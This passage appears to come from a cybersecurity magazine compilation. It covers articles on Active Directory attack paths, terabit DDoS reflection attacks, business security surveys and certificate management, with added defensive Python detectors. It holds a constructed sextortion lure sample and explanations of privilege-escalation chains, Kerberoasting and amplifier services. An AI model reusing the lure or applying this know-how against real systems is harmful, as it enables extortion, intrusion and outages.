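        return False
    payload, checksum = data[:-4], data[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def extract(text: str) -> dict:
    lowered = text.lower()
    keywords = [w for w in KEYWORDS if w in lowered]
    addresses = [(a, valid_legacy_address(a)) for a in BTC_LEGACY_RE.findall(text)]
    addresses += [(a, None) for a in BTC_BECH32_RE.findall(text)]
    deadline = DEADLINE_RE.search(text)
    password = PASSWORD_RE.search(text)
    return {
        "keywords": keywords,
        "btc_addresses": addresses,
        "deadline": deadline.group(0) if deadline else None,
        "leaked_password": password.group(1) if password else None,
        # Verdict: the lure vocabulary plus a payment address is the signature of the scam.
        "likely_sextortion": len(keywords) >= 3 and bool(addresses),
    }


# Constructed sample, modelled on the two examples above. The address is Bitcoin's
# well-known genesis-block address, used here only because it is public and valid.
SAMPLE = (
    "Hello, your password is 'Summer2019!' - that is proof I have been inside your device.\n"
    "My malware recorded you through your webcam while you visited adult sites.\n"
    "Send 0.05 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa within 48 hours or the video "
    "goes to all your contacts.\n"
)

if __name__ == "__main__":
    print(extract(SAMPLE))
```

A checksum-valid address is worth reporting and worth checking against earlier reports, because the same wallet usually appears across a whole campaign; the quoted password tells the responder which breach the victim's credential came from and therefore which accounts must be changed first.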
About the Author<br />
Harman is a director at Cyphere, where he advises businesses on how to<br />
protect themselves from cybersecurity threats. This involves performing<br />
hacking simulations in real time to explain technical concepts the way<br />
you would to your grandparents.<br />
Harman can be reached online at<br />
https://twitter.com/thecyphere<br />
https://www.linkedin.com/in/harman12/<br />
https://thecyphere.com/company/enquiries/<br />
Getting Started with Active Directory Security<br />
Evaluating, Benchmarking and Creating a Strategy<br />
By Justin Kohler, Director of BloodHound Enterprise, SpecterOps<br />
Over 90% of the Fortune 1000 use Microsoft Active Directory (AD) for identity and access management.<br />
This ubiquity makes AD a prime target for attackers, because compromising it almost always gives them<br />
the access they need to achieve their goals. Worse, AD is often easy to compromise: attackers abuse<br />
common errors in how user identities and privileges are configured, not exotic software flaws.<br />
Consider this scenario: An attacker obtains an employee’s credentials through a phishing attack. That user<br />
is a member of the “Help Desk” security group in AD, which carries a low level of privilege. But the Help Desk<br />
group has been nested inside another group that has privileges over a PCI server. Our hypothetical<br />
employee is not supposed to have control over that server, but the group nesting has accidentally given<br />
them privilege over it. That server also has a service account logged on, and now that the attacker<br />
controls the server it is simple to steal that account’s credentials. That service account happens to hold<br />
the “Add Member” right on the Domain Admins group, so the attacker can now make themselves a<br />
domain admin. This chain of steps that allows an adversary to escalate privilege and move laterally<br />
through Active Directory is an example of an Identity Attack Path (referred to as an “Attack Path” for the rest<br />
of this article). Multiple Attack Paths just like this exist in nearly every environment my colleagues and I<br />
examine.<br />
Improving AD security to prevent these attacks requires IT Operations, Security Operations, and Identity<br />
and Access Management (IAM) teams to work together, since each owns a portion of securing AD. A<br />
successful strategy must 1) be understandable and defensible to management, 2) give practical solutions<br />
that AD administrators can realistically implement, 3) be measurable so that the organization can track<br />
progress over time, and 4) not require changes that greatly interfere with normal business operations.<br />
How can this strategy be implemented? Let’s look at a practical, actionable approach to securing AD in<br />
four steps:<br />
Step One: Define High-Value Assets<br />
First, think like an adversary and focus on what they’ll focus on. Define the high-value assets in Active<br />
Directory that most attackers will target. A great place to start is the set of objects that confer full control<br />
over the domain. Commonly referred to as “Tier Zero” (or the “Control Plane” in Microsoft’s newer<br />
Enterprise Access Model), these include the Domain Admins, Enterprise Admins, Schema Admins, and<br />
Domain Controllers groups, the domain head object, and the group policies that apply to those objects.<br />
Adversaries want privilege over these assets because it unlocks whatever additional access they need to<br />
accomplish their objectives. IT may also consider including other critical systems that would have a<br />
significant payoff for attackers, such as privileged access management (PAM) solutions.<br />
Step Two: Map Attack Paths<br />
Next, map out all of the ways an adversary could compromise those high-value assets. Unfortunately,<br />
AD’s interface and built-in tooling do not provide the visibility needed to audit privilege effectively: it is<br />
hard to see what a user can actually do, which groups they are (transitively) members of, who holds rights<br />
on which objects, and where privileged credentials are exposed through logon sessions. Because nobody<br />
can see them, Attack Paths accumulate over time. Surfacing them requires specialized tooling such as<br />
BloodHound (an open-source Attack Path mapping tool), which collects this data and graphs how an<br />
attacker could chain misconfigurations together to control high-value assets.<br />
Step Three: Start with Critical Paths<br />
An enterprise AD environment can easily have tens of thousands of potential Attack Paths. For an AD<br />
security plan to be practical, it must prioritize which ones to fix first. Even without a way to measure the<br />
exact risk of each path, two manageable areas present significant risk in any environment: 1) Attack Paths<br />
from large groups to critical assets, and 2) Kerberoastable critical assets, that is, accounts with a service<br />
principal name (SPN) whose service tickets any domain user can request and then crack offline. Here is a<br />
full explanation of how to find and fix these specific issues.<br />
These two areas represent a significant risk because either can be exploited by effectively any member<br />
of the organization through the use or abuse of ordinary AD functionality. Another area the security or IAM<br />
team should review is any permission granted to the large default groups such as Domain Users,<br />
Authenticated Users, or Everyone. These permissions create large beachheads from which attackers can<br />
move laterally within the environment, even when they do not grant full control of a critical asset outright.<br />
Step Four: Develop Actionable Remediations<br />
The final piece of the puzzle is to create clear remediation guidance that all teams can understand. AD<br />
administrators or IAM team members will likely be the ones implementing any changes to AD. They have<br />
different priorities than the security team, and they are under extreme pressure to keep the backbone of<br />
the enterprise running. Therefore, they need to know how any change to AD will affect users' ability to do<br />
their jobs.<br />
That means any remediation recommendation needs to state clearly what the AD admins should do, the<br />
side effects of the change, and how the fix will reduce overall risk exposure. This lets AD admins,<br />
executives, and management make informed decisions about executing the change. For example, a<br />
remediation could break legacy application functionality. In that case the change may first need to be run<br />
in an audit-only mode, with the access it would deny logged for a substantial period, before the<br />
organization is confident it won’t cripple a critical business function.<br />
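To make the four steps concrete, here is an added example in Python (my code, not BloodHound or SpecterOps code). It builds a small graph from a hand-constructed directory snapshot that reproduces the scenario at the start of this article, then finds the shortest Attack Path from the phished user, from each large default group, and from each Kerberoastable account to Tier Zero. The object names, the edge vocabulary, and the snapshot itself are illustrative assumptions; a real assessment would collect them with a tool such as BloodHound.<br />

```python
"""Toy Attack Path mapper for the four-step plan above.

Added example, not BloodHound or SpecterOps code. The directory snapshot
below is constructed by hand to reproduce the article's scenario; object
names and edge types are illustrative and loosely follow BloodHound's
edge vocabulary.
"""
from collections import deque

# Step one: Tier Zero (control plane) objects an attacker ultimately wants.
TIER_ZERO = {"Domain Admins", "Enterprise Admins", "Schema Admins",
             "Domain Controllers", "corp.example (domain head)"}

# Large default groups that effectively every principal belongs to.
LARGE_GROUPS = {"Domain Users", "Authenticated Users", "Everyone"}

# Constructed snapshot: directed edges (source, edge_type, target).
#   MemberOf   - group membership (nesting included)
#   AdminTo    - local administrator on a computer
#   HasSession - the computer holds that principal's credentials in memory
#   AddMember  - right to add members to a group
#   GenericAll - full control over the target object
EDGES = [
    ("jsmith", "MemberOf", "Help Desk"),
    ("jsmith", "MemberOf", "Domain Users"),
    ("Help Desk", "MemberOf", "PCI Server Operators"),   # the nesting mistake
    ("PCI Server Operators", "AdminTo", "PCI-SRV01"),
    ("PCI-SRV01", "HasSession", "svc_backup"),           # service account logged on
    ("svc_backup", "AddMember", "Domain Admins"),
    ("Domain Users", "GenericAll", "LEGACY-APP01"),       # stale ACL on a server
    ("LEGACY-APP01", "HasSession", "jsmith"),
]

# Kerberoastable principals: user accounts with a servicePrincipalName.
# Any domain user can request a service ticket for them and crack it offline.
SPN_ACCOUNTS = {"svc_backup": "MSSQLSvc/PCI-SRV01.corp.example:1433"}


def build_graph(edges):
    """Adjacency list: node -> [(edge_type, neighbour), ...]."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src, []).append((kind, dst))
    return graph


def attack_paths(graph, start, targets):
    """Breadth-first search from `start`. Returns {target: shortest path},
    where a path is a list of (source, edge_type, target) hops."""
    paths = {}
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node in targets and node != start:
            paths[node] = path
        for kind, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, kind, nxt)]))
    return paths


def critical_paths(graph):
    """Step three, area 1: Attack Paths from large default groups to Tier Zero."""
    found = {}
    for group in sorted(LARGE_GROUPS):
        paths = attack_paths(graph, group, TIER_ZERO)
        if paths:
            found[group] = paths
    return found


def kerberoastable_tier_zero(graph, spn_accounts):
    """Step three, area 2: Kerberoastable accounts that can reach Tier Zero."""
    found = {}
    for account in sorted(spn_accounts):
        paths = attack_paths(graph, account, TIER_ZERO)
        if paths:
            found[account] = paths
    return found


def render(path):
    """'jsmith -[MemberOf]-> Help Desk -[MemberOf]-> ...' for a report."""
    return " ".join(f"{s} -[{k}]->" for s, k, _ in path) + " " + path[-1][2]


if __name__ == "__main__":
    graph = build_graph(EDGES)
    print("Phished user:")
    for target, path in attack_paths(graph, "jsmith", TIER_ZERO).items():
        print(f"  {len(path)} hops: {render(path)}")
    print("Large groups -> Tier Zero (fix first):")
    for group, found in critical_paths(graph).items():
        for target, path in found.items():
            print(f"  {group}: {len(path)} hops: {render(path)}")
    print("Kerberoastable accounts with a path to Tier Zero (fix first):")
    for acct, found in kerberoastable_tier_zero(graph, SPN_ACCOUNTS).items():
        for target, path in found.items():
            print(f"  {acct} ({SPN_ACCOUNTS[acct]}): {len(path)} hop(s) to {target}")
```

Every hop in the printed path is a remediation candidate, which is where step four starts: un-nesting Help Desk from the PCI group, removing the service account’s AddMember right, or keeping service accounts from leaving logon sessions on member servers each breaks the path, and the write-up for the AD admins has to say which one is proposed and what it will affect.<br />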
Active Directory has existed for over 20 years. Unfortunately, 20 years without visibility into how privileges<br />
are applied leads to seemingly insurmountable challenges. To make real progress, teams must use other<br />
methods to evaluate their AD environment, measure risk, and give practical, actionable guidance for<br />
fixing problems. Any plan that accounts for all these elements will be a massive step towards a more<br />
secure AD environment for everyone.<br />
About the Author<br />
Justin Kohler is the director for the BloodHound Enterprise<br />
product line at security consulting company SpecterOps.<br />
He is an operations expert who has over a decade of<br />
experience in project and program development. After<br />
beginning his career in the US Air Force, he worked for<br />
several consulting firms focused on process and workflow<br />
optimization and held positions at Microsoft and Gigamon.<br />
He enjoys building and leading teams focused on customer<br />
delivery at Fortune 500 companies.<br />
Justin can be reached online at @JustinKohler10 and at our company website https://specterops.io/<br />
Surviving The New Era of Terabit-Class DDoS Attacks<br />
By Richard Hummel, Threat Intelligence Lead, NETSCOUT<br />
In March 2018, a massive Distributed Denial of Service (DDoS) attack disrupted service for the developer<br />
platform GitHub. The attack, which lasted for approximately 20 minutes, was the largest on record at the time.<br />
It was also a milestone. Peaking at about 1.35 terabits per second, it formally inaugurated the era of<br />
terabit-class attacks; that is roughly the equivalent of 25 to 30 high-definition movies every second. It was<br />
followed days later by another attack, a 1.7 Tbps assault on a U.S.-based service provider.<br />
DDoS attacks flood targeted networks with traffic that overwhelms the system and causes outages.<br />
Attackers had, for years, been setting new records in the volume of traffic they could send. Still, in the<br />
years leading up to the attack, some debated whether an attack of that size was even feasible given<br />
certain technical limitations.<br />
Now, just three years later, terabit-class attacks occur nearly every month. Recently, Microsoft said that its<br />
Azure platform had mitigated a 2.4 Tbps attack.<br />
The good news is that organizations with up-to-date DDoS defenses and sufficient mitigation capacity<br />
can maintain availability in the face of these extremely large attacks. But that doesn’t mean enterprises<br />
can ignore the risk of massive DDoS attacks. Cybercriminals continue to innovate in this field by<br />
combining volumetric DDoS attacks with other threats, such as ransomware, or by deploying multi-vector<br />
attacks that drastically increase complexity for defenders.<br />
The New Normal<br />
Several factors have converged to drive terabit-class attacks. Attackers continue to build massive<br />
botnets, the armies of infected devices that can direct malicious traffic at targeted systems. Meanwhile,<br />
IoT devices, which too often ship with lax security, have only increased the number of devices available<br />
to compromise.<br />
A second factor is the continued development of reflection amplification attacks. Think of it this way: in<br />
most DDoS attacks, a targeted system is flooded with requests that each provoke a response. In a<br />
reflection attack, the attacker forges the source address of its requests so that they appear to come from<br />
the targeted network or device, and sends them to third-party servers (the reflectors). Those servers<br />
dutifully send their responses to the target, which never asked for them. And the size of a request and the<br />
size of its response are not always symmetrical. For some internet-exposed services, a small request<br />
elicits a response that is far larger. By bouncing traffic off these services, attackers significantly amplify<br />
the size of their attack.<br />
A reflection amplification attack thus both magnifies the amount of malicious traffic an attacker can<br />
generate and obscures its source. In the first half of 2021 alone, threat actors weaponized at least seven<br />
new reflection and amplification vectors. Each new vector feeds an explosion of new attack modes, and<br />
the number of vectors used in multivector DDoS attacks has soared, with a record-setting 31 attack vectors<br />
deployed in a single attack against one German organization.<br />
That is the type of attack launched against GitHub: a memcached reflection attack. Open source and free,<br />
Memcached is a high-performance, distributed memory caching system designed to speed up dynamic<br />
web applications, and it was never meant to be reachable from the internet over UDP. Its amplification<br />
factor is so great that a single small request can elicit a response more than 50,000 times larger.<br />
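The asymmetry described above is also what a defender looks for. As an added example (my code, not NETSCOUT’s), here is a Python detector that runs over constructed NetFlow-style flow records and flags a memcached reflection flood: many unrelated hosts sending near-MTU UDP “responses” from port 11211 to one destination that never sent a request. The records, addresses, and thresholds are assumptions.<br />

```python
"""Reflection/amplification flood detector over flow records.

Added example, not NETSCOUT tooling. The flow records are constructed
(NetFlow-style tuples) to mimic a memcached reflection flood against a
victim at 203.0.113.10; all addresses are from documentation ranges.
"""
from collections import defaultdict

# UDP services commonly abused as reflectors (well-known ports).
AMPLIFIER_PORTS = {19: "chargen", 53: "DNS", 123: "NTP", 161: "SNMP",
                   389: "CLDAP", 1900: "SSDP", 11211: "memcached"}

VICTIM = "203.0.113.10"

# (src_ip, src_port, dst_ip, dst_port, proto, bytes, packets)
FLOWS = [
    # 40 reflectors each sending 1000 near-MTU response packets to the victim
    *[(f"198.51.100.{i}", 11211, VICTIM, 40000 + i, "udp", 1_400_000, 1000)
      for i in range(1, 41)],
    # the victim's own, legitimate DNS exchange (request, then reply)
    (VICTIM, 50123, "192.0.2.53", 53, "udp", 120, 2),
    ("192.0.2.53", 53, VICTIM, 50123, "udp", 480, 2),
    # ordinary inbound web traffic for contrast
    ("192.0.2.77", 443, VICTIM, 51000, "tcp", 90_000, 120),
]


def detect_reflection(flows, min_reflectors=10, min_bytes=10_000_000,
                      min_ratio=100.0):
    """Flag (victim, service) pairs that receive large volumes of UDP
    'responses' from many hosts without having sent matching requests.

    The tell-tale sign of a reflection attack is the asymmetry: the victim
    never asked, so response bytes / request bytes explodes, and the
    responders are numerous and unrelated to each other.
    """
    responses = defaultdict(lambda: {"bytes": 0, "pkts": 0, "reflectors": set()})
    requests = defaultdict(int)
    for src, sport, dst, dport, proto, nbytes, pkts in flows:
        if proto != "udp":
            continue
        if sport in AMPLIFIER_PORTS:          # traffic *from* a service port
            entry = responses[(dst, sport)]
            entry["bytes"] += nbytes
            entry["pkts"] += pkts
            entry["reflectors"].add(src)
        if dport in AMPLIFIER_PORTS:          # traffic *to* a service port
            requests[(src, dport)] += nbytes
    alerts = []
    for (victim, port), entry in responses.items():
        sent = requests.get((victim, port), 0)
        ratio = entry["bytes"] / sent if sent else float("inf")
        if (len(entry["reflectors"]) >= min_reflectors
                and entry["bytes"] >= min_bytes and ratio >= min_ratio):
            alerts.append({
                "victim": victim,
                "service": AMPLIFIER_PORTS[port],
                "port": port,
                "reflectors": len(entry["reflectors"]),
                "bytes": entry["bytes"],
                "avg_packet_bytes": entry["bytes"] // entry["pkts"],
                "response_to_request_ratio": ratio,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_reflection(FLOWS):
        print(f"{alert['service']} reflection flood against {alert['victim']}: "
              f"{alert['reflectors']} reflectors, {alert['bytes'] / 1e6:.0f} MB, "
              f"avg packet {alert['avg_packet_bytes']} B")
```

The legitimate DNS exchange in the sample does not fire because the victim sent the request and the ratio stays small. In production the same logic runs over sampled NetFlow, sFlow, or IPFIX exports and the thresholds are tuned to a baseline; the detection tells you what is happening, but because the flood is already on your link, mitigation has to happen upstream at an ISP or scrubbing provider, which is the capacity question raised later in this article.<br />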
Mixing Tactics, Vectors, and Targets<br />
Large attacks are relatively easy for automated defenses to identify. But even a noisy attack has value to<br />
attackers. A large DDoS campaign may, for example, provide cover for another intrusion, and threat actors<br />
can adapt their tactics to overcome defenses when volume alone does not suffice (though, to be clear, a<br />
big attack still causes many problems on its own).<br />
An emerging trend is the development of adaptive attack techniques designed to evade traditional<br />
defenses. These attacks require extensive pre-attack research and reconnaissance to identify weak<br />
points, but the result is an attack calibrated to overcome a specific organization’s defenses. Furthermore,<br />
attackers don’t always need to hit an organization directly to cause damage. In many cases DDoS attacks<br />
target the services it depends on, such as its DNS servers or VPN concentrators, to inflict collateral damage.<br />
Defending Against Terabit-Class Attacks<br />
Overall, the first half of 2021 saw a staggering 11 million DDoS attacks. It’s not a matter of if a company<br />
will find itself in the crosshairs of a DDoS attack, it’s a matter of when. The pandemic, and its<br />
accompanying shift toward more digital services for consumers and businesses, has expanded the threat<br />
surface. Businesses are more reliant on digital services to reach their customers than ever before, driving<br />
an even greater need for adequate defenses.<br />
The first step in protecting an organization is taking a good, hard look in the mirror. The shifting dynamics<br />
of the workplace brought massive changes. Businesses should conduct frequent evaluations to stay<br />
ahead of new threats, including assessments of whether their DDoS mitigation capacity is still adequate;<br />
an on-premises appliance alone cannot absorb a multi-terabit flood, because the attack saturates the<br />
upstream link before the appliance ever sees it. Companies should also talk to the third-party suppliers<br />
they rely on for connectivity, including ISPs and VPN providers, to ensure those suppliers have adequate<br />
mitigation capacity. Running security tools that analyze packet data can provide insight into possible<br />
incursions and changes to networks and infrastructure, offering early alerts to security and network<br />
operations teams.<br />
Despite being one of the oldest known forms of cyber attack, DDoS remains a pervasive threat. Terabit-class<br />
attacks are unfortunately inching closer to the mainstream, but even worse, they are just one tool<br />
in the attackers’ arsenal as they continue to develop new vectors and attack methods. Hence it is more<br />
imperative than ever that defenders and security professionals remain vigilant to protect the critical<br />
infrastructure that connects and enables the modern world.<br />
About the Author<br />
Richard Hummel has over a dozen years of experience in the<br />
intelligence field and is currently the Threat Intelligence Research Lead<br />
for NETSCOUT's ASERT Research Team. Previously, he served as<br />
Manager and Principal Analyst on the FireEye iSIGHT Intelligence’s<br />
Financial Gain team. He began his career as a Signals Intelligence<br />
Analyst with the United States Army. During the course of his service<br />
he became certified in Digital Network Intelligence and supported<br />
multiple operations overseas including a deployment to Iraq.<br />
After departing from the Army as an enlisted soldier, he began<br />
contracting work as a Computer Network Operations analyst in support<br />
of the Army. During his tenure as a contractor, he developed many<br />
methods and procedures for conducting Cyber Discovery and trained<br />
analysts at Army INSCOM HQ's. At FireEye iSIGHT Intelligence, he led a team of technical analysts in<br />
the tracking, reporting, and analysis of various cyber crime related malware families.<br />
Richard can be reached online at www.netscout.com<br />
Cyber (In)Secure: Business Sentiment on Cyber Security<br />
Challenges<br />
By James Edgar, Senior Vice President and Chief Information Security Officer, FLEETCOR<br />
Undoubtedly the last two years have been incredibly challenging for businesses, as many companies<br />
grappled with the health and safety of employees, massive revenue loss, threats of closure and the great<br />
resignation. To make matters worse, as businesses set their sights on recovery, cybercriminals focused<br />
on taking advantage of any vulnerability available.<br />
According to the FBI’s Internet Crime Report, the Internet Crime Complaint Center (IC3) saw a 69%<br />
increase in total complaints from 2019 to 2020. Business e-mail compromise, phishing and ransomware<br />
are all on the rise.<br />
Yet, despite the uptick in cyberattacks since the pandemic began, global corporate payments provider<br />
FLEETCOR surveyed business owners and learned that 91% say they have not fallen victim to a cyberattack<br />
in the last 12 months.<br />
According to FLEETCOR’s 2021 Insights on Business Cybersecurity Study, the share reporting an attack is<br />
even lower among small companies: just 7% of respondents with 20 or fewer employees say they fell<br />
victim to a cyberattack during the same timeframe. For businesses with 21-50 employees, that number<br />
doubles to 14%.<br />
Survey results show businesses are becoming increasingly aware and diligent in their security practices,<br />
especially as the pandemic reshapes work environments, including increased cloud adoption and<br />
companies welcoming hybrid work scenarios. However, the threat of a cyberattack still looms.<br />
Business disruption is the most prevalent concern<br />
Nearly two-thirds (62%) of FLEETCOR survey respondents report concern that their business is at risk of<br />
becoming cyberattack prey, while 83% strongly agree that cybersecurity breaches are damaging to business.<br />
Not surprisingly, when asked to select the most concerning cyberattack consequence, 65% of<br />
respondents chose loss of profitability and/or disruption to operations. And it’s no wonder, since in 2020<br />
the average cost of a data breach was $3.86 million, according to the Cost of a Data Breach Report by<br />
IBM Security and the Ponemon Institute.<br />
Little spent on cybersecurity protection<br />
Despite the high level of apprehension about being at risk of a cyberattack, few businesses surveyed by<br />
FLEETCOR put their money where their concern is. Fifty-seven percent of respondents said they allocate<br />
5% or less of their annual IT budget to cybersecurity protection, while 25% allot 6%-10% of their IT<br />
budgets to it. Although they’d like to spend more on cybersecurity protection, lack of capital is the primary<br />
reason businesses don’t.<br />
Digital payments here to stay<br />
As many businesses temporarily closed physical locations at the onset of the pandemic, digital payments<br />
soared, and this shows no signs of slowing. More than half of American business owners (53%) surveyed<br />
said the global crisis increased their adoption of digital payments, with apps being the most used method.<br />
It’s no wonder, since they’re easy to use, available around the clock and, when properly implemented, safe.<br />
And while secure digital practices should be table stakes for companies conducting business with other<br />
companies, many respondents – four out of 10 – don’t know about their vendors’ cybersecurity policies<br />
and practices. More than 20% rely on word of mouth or said they had no knowledge regarding this<br />
matter at all.<br />
This not knowing is risky. When vendors lack strong security controls, your company is exposed to a myriad<br />
of risks – financial, operational, regulatory and reputational, to name a few.<br />
Don’t risk it<br />
Going into the new year, evaluate your company and vendor security practices and identify areas you<br />
might be falling short. Consult with your fellow business leaders and put a plan in place to mitigate risk.<br />
The last two years have proven life is unpredictable, but the more you understand your business risk<br />
realities, the better equipped you will be to handle security challenges.<br />
About the Author<br />
James Edgar, Senior Vice President and Chief Information<br />
Security Officer, FLEETCOR<br />
James Edgar is currently SVP & CISO for FLEETCOR<br />
Technologies, a global leader in fuel, lodging, tolls and<br />
commercial payment solutions. He oversees the global<br />
Information Security and IT Compliance teams, which span four<br />
continents and multiple business lines. Before joining<br />
FLEETCOR, James was the VP of Security Architecture, Risk and<br />
Assurance for U.S. Bank's payment processing division, Elavon.<br />
Prior to joining U.S. Bank, James led the Security Architecture<br />
and Risk team for Cox Communications, the 3rd largest cable<br />
operator in the nation. James has served on the Steering<br />
Committee for the Payment Processors Information Sharing Council (PP-ISC), participated in the NIST<br />
Cybersecurity Framework (CSF) development workshops and has been actively involved in the<br />
governance, risk and compliance (GRC) community in Atlanta.<br />
Enterprises Cannot Achieve Zero Trust Security Without<br />
Machine Identity Management<br />
With the rise of machines and the shift towards zero trust security, organizations will require a new type<br />
of identity management<br />
By Murali Palanisamy, chief solutions officer, AppViewX<br />
The enterprise IT landscape is experiencing phenomenal disruption. While digital transformation, cloud<br />
migration, and the remote work model have opened a world of possibilities for organizations, these<br />
sweeping changes have permanently reset the rules of the cybersecurity game. The attack surface is<br />
expanding, and attackers are exploiting these changes with increasing frequency and sophistication.<br />
Organizations are increasingly looking at alternative approaches for securing a growing, cloud-driven,<br />
distributed environment. The surge of digital technologies has led to massive growth in the number of<br />
machines, that is, digital assets such as servers, containers, applications, services, and devices, each of<br />
which needs an identity (typically an X.509 certificate and its private key, or an SSH key) to authenticate<br />
to the others. Securing these distributed assets and their communication is critical for data security.<br />
However, with the network perimeter fast disappearing, this has become a significant challenge. Amid all<br />
these changes, a new priority has emerged: managing the identities of machines. In fact, Gartner has<br />
named machine identity management an essential element in securing today’s enterprises.<br />
This recognition and the shift towards zero trust security have led security leaders to recognize the<br />
importance of machine identity management, but how to approach it properly remains one of the biggest<br />
challenges.<br />
Building digital trust<br />
With identity becoming the new network perimeter, verifying digital identities on a network is integral to a<br />
zero-trust strategy. But limiting verification to user identities is not sufficient. Proper zero trust<br />
implementation is heavily dependent upon digital certificates and key pairs: they are how workloads and<br />
devices prove who they are to each other (mutual TLS, for instance) and how traffic between them is<br />
encrypted. The objective is to strengthen security by verifying the device or workload alongside the user.<br />
Adopting the zero trust model starts with segmentation, privileged access management (PAM),<br />
multi-factor authentication (MFA), vulnerability and patch management, and security analytics.<br />
However, companies often miss one crucial area: managing machine identities. A forgotten, expired, or<br />
stolen certificate or key undermines the encrypted tunnels that every other control relies on.<br />
Manually managing certificate lifecycles, whether through spreadsheets or paper documents, is<br />
time-consuming, error-prone, and highly inefficient. With hundreds of thousands of certificates in<br />
circulation, administrators cannot rely on manual techniques to keep the public key infrastructure (PKI)<br />
secure and up to date. There is a pressing need for a management system that includes an inventory of<br />
every certificate and key, alerting on upcoming expiry and policy violations, and automated workflows for<br />
PKI tasks such as certificate requisition, renewal, revocation, and deployment.<br />
Recognizing the power of automation<br />
While digital certificates contribute much to a zero-trust architecture, organizations need a managed<br />
solution with the capabilities to automate the certificate lifecycle. Implementing end-to-end certificate<br />
lifecycle automation is a key initiative towards achieving a fully functional zero trust model.<br />
Automation tools simplify certificate operations by allowing administrators to carry out all necessary<br />
activities from a single interface (i.e., without using each certificate authority’s own console to renew or<br />
revoke the certificates it has issued). Finally, automation enables cryptographic agility: when a protocol,<br />
algorithm, or key size is deprecated, every affected certificate can be found and re-issued under the new<br />
policy instead of being hunted down one at a time, so digital identities keep pace with algorithm upgrades<br />
and offer the best possible protection under all circumstances.<br />
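The inventory, alerting, and crypto-agility pieces described in the two preceding sections can be shown in a few dozen lines. The following is an added example in Python (my code, not AppViewX’s); it reads a constructed CSV inventory of the kind a certificate lifecycle tool or a network scan would export, checks each certificate against an assumed house policy (minimum key size, allowed signature hashes, maximum validity, renewal lead time), and produces an ordered work queue. Names, dates, and thresholds are assumptions.<br />

```python
"""Certificate inventory policy check and renewal scheduling.

Added example, not AppViewX code. The inventory is a constructed CSV export
of the kind a certificate lifecycle management (CLM) tool or a network scan
would produce; names, dates, and the policy thresholds are assumptions.
"""
import csv
import io
from datetime import date

# Constructed inventory export (assumption: one row per deployed certificate).
INVENTORY_CSV = """\
common_name,issuer,key_algo,key_bits,sig_hash,not_before,not_after,owner
api.example.com,Public CA,RSA,2048,sha256,2021-01-10,2022-01-09,platform-team
vpn.example.com,Internal CA,RSA,1024,sha1,2019-06-01,2024-05-31,network-team
legacy.example.com,Internal CA,RSA,2048,sha256,2020-03-01,2023-03-01,app-team
build-signer,Internal CA,EC,256,sha256,2021-11-01,2022-10-31,devops
"""

# Assumed house policy: minimum key strength, allowed signature hashes,
# maximum validity, and how far ahead of expiry renewal must start.
POLICY = {
    "min_key_bits": {"RSA": 2048, "EC": 256},
    "allowed_sig_hashes": {"sha256", "sha384", "sha512"},
    "max_validity_days": 398,
    "renew_lead_days": 30,
}

DEMO_TODAY = date(2021, 12, 15)   # fixed "today" so the run is reproducible


def load_inventory(text):
    """Parse the CSV export into dicts with real ints and dates."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["key_bits"] = int(row["key_bits"])
        row["not_before"] = date.fromisoformat(row["not_before"])
        row["not_after"] = date.fromisoformat(row["not_after"])
    return rows


def evaluate(cert, today, policy=POLICY):
    """Return the policy findings and the action owed for one certificate."""
    issues = []
    days_left = (cert["not_after"] - today).days
    validity = (cert["not_after"] - cert["not_before"]).days
    if days_left < 0:
        issues.append("expired")
    elif days_left <= policy["renew_lead_days"]:
        issues.append(f"expires in {days_left} days")
    if cert["key_bits"] < policy["min_key_bits"].get(cert["key_algo"], 10**9):
        issues.append(f"weak key {cert['key_algo']}-{cert['key_bits']}")
    if cert["sig_hash"] not in policy["allowed_sig_hashes"]:
        issues.append(f"deprecated signature hash {cert['sig_hash']}")
    if validity > policy["max_validity_days"]:
        issues.append(f"validity {validity} days exceeds maximum")

    # Crypto-agility rule: anything cryptographically weak is re-keyed now,
    # regardless of time left; expiring certs are renewed; certs that only
    # violate the validity cap are re-issued at their next renewal.
    if any(i.startswith(("weak key", "deprecated")) for i in issues):
        action = "rekey-and-reissue-now"
    elif any(i.startswith(("expired", "expires")) for i in issues):
        action = "renew-now"
    elif issues:
        action = "reissue-at-next-renewal"
    else:
        action = "none"
    return {"common_name": cert["common_name"], "owner": cert["owner"],
            "days_left": days_left, "issues": issues, "action": action}


def work_queue(text, today):
    """Evaluate every certificate and order the queue, most urgent first."""
    urgency = {"rekey-and-reissue-now": 0, "renew-now": 1,
               "reissue-at-next-renewal": 2, "none": 3}
    results = [evaluate(c, today) for c in load_inventory(text)]
    return sorted((r for r in results if r["action"] != "none"),
                  key=lambda r: (urgency[r["action"]], r["days_left"]))


if __name__ == "__main__":
    for item in work_queue(INVENTORY_CSV, DEMO_TODAY):
        print(f"{item['action']:24} {item['common_name']:20} "
              f"owner={item['owner']:14} {'; '.join(item['issues'])}")
```

Each queue entry carries an owner, which is what turns an alert into a workflow: the automation layer can open the ticket, request the new certificate from the right CA, and push it to the endpoint, and a policy change (say, raising the minimum RSA size) is applied by editing one dictionary and re-running the queue rather than by auditing by hand.<br />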
Embracing PKI to secure networks<br />
It’s no longer enough to simply set up the necessary TLS certificates on websites and servers and renew<br />
them when they expire. PKI protects nearly every internet-facing system (and its back-end servers),<br />
software (in the form of code-signing certificates), and communication in general. There have been<br />
well-documented occurrences of PKI being the weak link in a breach: in the 2017 Equifax breach, an<br />
expired certificate on a traffic-inspection device left encrypted traffic uninspected for months, delaying<br />
detection of the intrusion. Additional emerging trends that have underscored the need for organizations<br />
to embrace PKI include:<br />
• Cloud Applications: With the emergence of cloud-based apps, multicloud deployment, and<br />
container-based deployment, the need to secure the hosting infrastructure and individual<br />
consumer endpoints has become paramount.<br />
• Internet of Things (IoT): Not only are IoT deployments numerous in terms of individually<br />
connected endpoints, but many IoT applications also hold sensitive data that should be<br />
protected, with PKI as the first line of defense.<br />
• DevOps: PKI and DevOps have traditionally been at odds: DevOps exemplifies agility, while PKI<br />
has been a slow, manual exercise. Yet certificates need to be issued as rapidly as code is deployed<br />
to protect outgoing code, applications, and communication channels in general.<br />
